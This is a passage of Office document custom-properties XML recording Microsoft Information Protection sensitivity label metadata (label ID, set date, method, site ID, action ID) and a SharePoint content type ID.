  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_5fae8262-b78e-4366-8929-a5d6aac95320_SetDate">
    <vt:lpwstr>2022-04-08T07:51:05Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_5fae8262-b78e-4366-8929-a5d6aac95320_Method">
    <vt:lpwstr>Standard</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_5fae8262-b78e-4366-8929-a5d6aac95320_Name">
    <vt:lpwstr>5fae8262-b78e-4366-8929-a5d6aac95320</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_5fae8262-b78e-4366-8929-a5d6aac95320_SiteId">
    <vt:lpwstr>cf36141c-ddd7-45a7-b073-111f66d0b30c</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_5fae8262-b78e-4366-8929-a5d6aac95320_ActionId">
    <vt:lpwstr>3c7e973e-4387-487b-b9f2-8c1ba350ceab</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_5fae8262-b78e-4366-8929-a5d6aac95320_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="ContentTypeId">
    <vt:lpwstr>0x010100C27F7341B06EFC41B56229C9426A4853</vt:lpwstr>
  </property>
</Properties>
</file>